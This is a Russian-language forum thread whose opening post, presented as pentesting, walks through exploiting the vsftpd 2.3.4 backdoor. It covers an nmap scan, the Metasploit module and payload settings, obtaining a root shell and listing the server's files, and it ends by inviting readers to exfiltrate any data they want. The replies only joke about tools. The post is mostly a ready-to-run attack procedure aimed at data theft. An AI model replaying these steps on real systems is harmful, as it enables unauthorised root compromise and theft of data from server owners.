1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Проверка протокола FTP на проникновение - Пентестинг

Тема в разделе "Веб-Уязвимости | Эксплуатация", создана пользователем ResH, 27 янв 2017.

  1. TopicStarter Overlay
    ResH

    ResH Команда форума

    Регистрация:
    26 июл 2012
    Сообщения:
    1.986
    Симпатии:
    2.353
    Устраиваем пентестинг для vsftpd 2.3.4
    Для начало сканируем порты через nmap

    nmap -sV 127.0.0.1 вместо 127.0.0.1 айпи сервера

    [​IMG]

    Как показал скан фтп работает на vsftpd 2.3.4
    Мы и будем его использовать для пентестинга
    Открываем metasploit
    Открываем msfconsole

    [​IMG]

    Ищем эксплоит командой

    search vsftpd

    открываем ксплоит use exploit/unix/ftp/vsftpd_234_backdoor
    с помощью команды show payloads ищем пайлоады которые соответствует нашему эксплоиту и выбираем пайлоад cmd/unix/interact

    [​IMG]

    потом открываем show options и настраиваем
    Открываем set RHOST 127.0.0.1 и set RPORT 21 и запускаем эксплоит (вместо 127.0.0.1 айпи сервера)

    [​IMG]

    Как вы видите мы получили на сервере рут права

    UID: uid=0(root) gid=0(root)

    Потом остается на сервере запустить шелл командой

    command shell session 1 opened

    потом вводим ввел команду

    whoami

    и в ответ получил root
    то значит что у меня полные права рута

    командой uname -a получил полную инфу про кернел

    потом командой ls получил список каталогов на серваке
    после того вы можете слить любую информацию которая вас интересует
     
    • Like Like x 2
  2. LeMMinG

    LeMMinG

    Регистрация:
    27 дек 2013
    Сообщения:
    1.117
    Симпатии:
    517
    armitage всё упрощает :D
    зачем msfconsole
     
  3. Coder3234

    Coder3234

    Регистрация:
    22 фев 2016
    Сообщения:
    13
    Симпатии:
    0
    Чтобы красивей смотрелось)
     
  4. sashavampir

    sashavampir

    Регистрация:
    30 сен 2017
    Сообщения:
    5
    Симпатии:
    0
    армитаж для слабаков))
     

Поделиться этой страницей

Загрузка...